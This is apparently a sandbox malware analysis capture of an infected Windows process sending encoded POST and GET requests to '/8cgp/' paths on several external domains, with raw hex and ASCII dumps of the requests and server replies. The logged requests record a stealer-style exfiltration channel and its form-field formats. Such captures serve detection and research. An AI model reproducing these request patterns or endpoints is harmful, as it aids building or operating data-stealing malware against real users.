                                                                    Data Ascii: /QsOeCXPL/4atPih0NZiW2xTChYFwApTi1zChbvLAUVVjZBlJeheClMODxEFLdnooXfwNFHFe33kr+kLalxuptuXTsPGzRJkgYwqFbsHhymzyiRHGlE0Wy3D2t4au2lNpWbw2KXNl1cVowwh/4QBVXrVdBHg3da6a0HgTIU14RVLgkbPxeuJ+5v/L/i/vdXvYBaH+q6fDmEFkTeWh9SsijG2K46p4mMf6b1vEEAoOqY1Mf82wDT
                                                                    Apr 24, 2024 12:29:26.564759970 CEST15468OUTData Raw: 53 70 6c 38 49 58 46 6e 65 32 30 6e 67 33 64 44 45 4a 68 53 65 31 62 6a 52 35 68 54 36 61 68 75 52 4f 48 6f 37 70 59 6e 50 63 62 57 70 59 75 39 78 71 34 39 77 68 52 44 58 74 73 4d 5a 41 4c 34 71 7a 75 65 52 73 72 59 53 68 68 50 74 62 42 36 36 53
                                                                    Data Ascii: Spl8IXFne20ng3dDEJhSe1bjR5hT6ahuROHo7pYnPcbWpYu9xq49whRDXtsMZAL4qzueRsrYShhPtbB66S95iWpqmlU6rgidO1fLZWdsKJa/4b5ZygBg02KoCi0+UDj1D/rGl2OQn5aTpXPAXNP9fHQndTPS+POTxPMI0+jNveMfTZ+ORLDJ044nQx0n/Z+TQ7cXE2OycZQ07AVl/vrDkQ3DDK+c7AiwQFyTPkjx+OPTmrgUSNC
                                                                    Apr 24, 2024 12:29:26.836555004 CEST2578OUTData Raw: 78 66 46 2b 41 55 4b 33 6b 76 53 45 44 4f 4f 45 2b 52 59 44 48 70 4c 6e 67 51 41 4c 4d 6c 56 74 61 57 4f 6b 4f 39 36 30 30 38 4d 48 72 30 53 65 2b 4c 63 79 75 69 73 71 71 76 50 71 69 32 76 72 6b 5a 4e 6b 53 73 53 61 6a 31 5a 71 2f 7a 4a 64 6f 56
                                                                    Data Ascii: xfF+AUK3kvSEDOOE+RYDHpLngQALMlVtaWOkO96008MHr0Se+LcyuisqqvPqi2vrkZNkSsSaj1Zq/zJdoVBQ8GJdR39vIDdyrugZl2q7xMRSKLWZQjjHeaf9EJd+Qzn2RFYy2UG7o3F1YuSLDKyTgph30IFzdWyXIYSAI/16nAvvBVKD20dLQyPkefbTsuM7mAmaKteHxqWfmlxPgu3/TYspeMCc074FpP/PitKhma/K6oRmhic
                                                                    Apr 24, 2024 12:29:26.836652994 CEST2578OUTData Raw: 5a 5a 4f 34 35 6e 68 55 48 6c 6e 39 64 72 39 71 62 41 64 4f 73 38 34 5a 74 61 68 75 52 63 61 6e 79 4d 42 39 32 61 62 6d 36 33 46 66 5a 31 64 6f 59 41 79 76 6f 4e 62 72 77 41 30 67 69 30 75 4f 57 35 46 30 7a 38 79 6d 30 39 58 30 78 75 61 4c 42 44
                                                                    Data Ascii: ZZO45nhUHln9dr9qbAdOs84ZtahuRcanyMB92abm63FfZ1doYAyvoNbrwA0gi0uOW5F0z8ym09X0xuaLBDVZR5WBykmQxYve1w5g1jZyRvZHSj2Hqr0msjEvmLUXILg6Noy2dRxnhI+FN5z3I9jx+0WacMUYoDaMAmsnLDHSHWRaK86ris9MWok3ClCWjjz8CcPd68kg4AamRXAwsPaaH8ajN0GwDfk8nzWFdFld9OaxAvqlEj1
                                                                    Apr 24, 2024 12:29:27.110719919 CEST377INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:26 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.11.2050261118.27.122.214807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:29.102055073 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:29.384545088 CEST359INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:29 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.11.2050262157.7.107.63807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:35.158042908 CEST680OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 31 45 47 6f 64 74 49 5a 47 34 6c 43 45 78 54 31 56 2b 34 34 35 4f 43 31 4b 64 42 38 30 61 43 31 57 59 58 33 63 4b 4c 59 35 63 45 71 4a 73 6c 50 32 49 57 6a 54 53 65 59 36 58 64 4b 63 4c 46 31 5a 6e 43 7a 74 62 33 62 2f 5a 63 31 52 44 41 69 43 53 37 38 76 78 37 54 42 6d 4c 76 64 72 5a 73 44 71 68 63 30 62 34 38 7a 38 58 30 39 4a 6e 4e 50 67 33 62 45 33 7a 65 6d 42 4e 6b 4c 36 2b 62 4c 2f 57 56 62 65 76 31 6c 49 50 78 36 53 53 76 7a 77 6c 66 4a 34 53 58 78 55 32 43 4a 4b 66 67 58 72 6c 41 75 36 45 44 61 75 63 47 55 6c 6b 6b 76 59 4b 73 58 38 78 70 6f 42 6a 2f 43 4a 79 37 6a 67 3d 3d
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCExT1V+445OC1KdB80aC1WYX3cKLY5cEqJslP2IWjTSeY6XdKcLF1ZnCztb3b/Zc1RDAiCS78vx7TBmLvdrZsDqhc0b48z8X09JnNPg3bE3zemBNkL6+bL/WVbev1lIPx6SSvzwlfJ4SXxU2CJKfgXrlAu6EDaucGUlkkvYKsX8xpoBj/CJy7jg==
                                                                    Apr 24, 2024 12:29:35.641222000 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
                                                                    Apr 24, 2024 12:29:35.641241074 CEST179INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e
                                                                    Data Ascii: /javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/co
                                                                    Apr 24, 2024 12:29:35.641280890 CEST1289INData Raw: 31 30 37 31 0d 0a 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f
                                                                    Data Ascii: 1071re\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/a-two-spa-salon.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.4"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={
                                                                    Apr 24, 2024 12:29:35.641308069 CEST1289INData Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43
                                                                    Data Ascii: fined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(functi
                                                                    Apr 24, 2024 12:29:35.641319990 CEST1289INData Raw: 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68
                                                                    Data Ascii: tion(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everyt
                                                                    Apr 24, 2024 12:29:35.641329050 CEST350INData Raw: 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a
                                                                    Data Ascii: ssic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2p
                                                                    Apr 24, 2024 12:29:35.641516924 CEST1289INData Raw: 32 36 39 36 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c
                                                                    Data Ascii: 2696<style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color
                                                                    Apr 24, 2024 12:29:35.641529083 CEST1289INData Raw: 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33
                                                                    Data Ascii: gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 1
                                                                    Apr 24, 2024 12:29:35.641685963 CEST1289INData Raw: 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70
                                                                    Data Ascii: w--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px r
                                                                    Apr 24, 2024 12:29:35.641700983 CEST1289INData Raw: 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69
                                                                    Data Ascii: ems: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-pos
                                                                    Apr 24, 2024 12:29:35.922972918 CEST1289INData Raw: 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 62 61 63 6b 67
                                                                    Data Ascii: e-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.11.2050263157.7.107.63807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:37.959556103 CEST1020OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 31 45 47 6f 64 74 49 5a 47 34 6c 43 43 69 4c 31 55 5a 6b 34 75 2b 43 36 48 4e 42 38 36 36 43 35 57 59 4c 33 63 49 6e 78 35 4b 38 71 4a 4f 4e 50 33 4b 79 6a 51 53 65 59 31 33 64 54 66 37 46 79 5a 6e 47 37 74 65 50 62 2f 5a 59 31 52 77 34 69 41 69 37 2f 68 52 37 53 4a 47 4c 75 4c 62 5a 36 44 72 64 71 30 61 63 38 30 50 54 30 76 61 50 4e 4c 31 44 59 44 58 7a 59 76 68 4e 6e 43 61 2b 76 4c 2f 61 72 62 63 2b 58 6b 36 54 78 37 7a 79 76 68 41 6c 51 63 59 53 4d 75 45 33 73 42 6f 47 53 57 70 74 43 6e 4e 67 48 41 4d 63 70 59 46 42 70 74 49 4f 44 47 4f 35 37 78 46 65 68 47 64 6e 32 78 36 4a 53 57 43 39 50 70 71 77 64 4f 42 6e 6f 67 33 54 71 52 59 66 39 67 38 52 4a 59 5a 35 47 65 65 52 55 56 4d 55 5a 51 56 34 61 4b 64 33 59 41 73 62 5a 55 33 43 55 35 59 78 53 68 51 2f 76 78 38 54 64 35 35 6f 72 55 30 4c 66 62 48 2b 34 36 51 6c 31 66 6f 2f 59 4e 6f 74 6d 4b 43 48 4b 30 72 46 38 30 52 48 61 30 78 54 4e 69 70 76 39 6f 53 31 4c 2f 59 49 67 4e 58 78 6e 6b 4d 68 69 37 6f 77 70 4c 36 57 48 79 65 77 53 56 4c 6f 4f 56 62 76 6b 41 77 2b 78 51 42 6c 4a 79 4c 4a 48 75 53 6e 30 67 68 33 6f 45 70 6b 38 30 37 4e 4e 63 31 6f 73 48 54 69 39 53 51 4d 45 5a 6a 62 2b 35 59 6c 34 47 39 69 6b 31 77 76 5a 59 7a 4f 42 47 33 7a 73 33 33 2f 43 59 65 30 45 59 42 44 58 72 77 6a 62 66 47 4a 74 50 56 4f 4a 6d 75 6a 52 59 33 53 4d 6d 77 2b 73 53 6f 77 47 68 78 6a 32 32 73 32 39 6e 4c 79 4a 67 52 48 71 33 55 4b 74 45 4a 43 72 67 30 74 4a 69 46 56 6d 75 34 2f 65 58 73 38 52 48 38 4f 42 63 47 55 6e 62 38 45 31 51 4e 7a 42 34 31 35 42 39 6f 4e 76 4e 52 77 78 44 76 30 52 44 70 4e 36 72 68 32 54 42 31 76 63 6e 51 39 37 43 42 73 3d
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCCiL1UZk4u+C6HNB866C5WYL3cInx5K8qJONP3KyjQSeY13dTf7FyZnG7tePb/ZY1Rw4iAi7/hR7SJGLuLbZ6Drdq0ac80PT0vaPNL1DYDXzYvhNnCa+vL/arbc+Xk6Tx7zyvhAlQcYSMuE3sBoGSWptCnNgHAMcpYFBptIODGO57xFehGdn2x6JSWC9PpqwdOBnog3TqRYf9g8RJYZ5GeeRUVMUZQV4aKd3YAsbZU3CU5YxShQ/vx8Td55orU0LfbH+46Ql1fo/YNotmKCHK0rF80RHa0xTNipv9oS1L/YIgNXxnkMhi7owpL6WHyewSVLoOVbvkAw+xQBlJyLJHuSn0gh3oEpk807NNc1osHTi9SQMEZjb+5Yl4G9ik1wvZYzOBG3zs33/CYe0EYBDXrwjbfGJtPVOJmujRY3SMmw+sSowGhxj22s29nLyJgRHq3UKtEJCrg0tJiFVmu4/eXs8RH8OBcGUnb8E1QNzB415B9oNvNRwxDv0RDpN6rh2TB1vcnQ97CBs=
                                                                    Apr 24, 2024 12:29:38.446609020 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Raw: 66 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 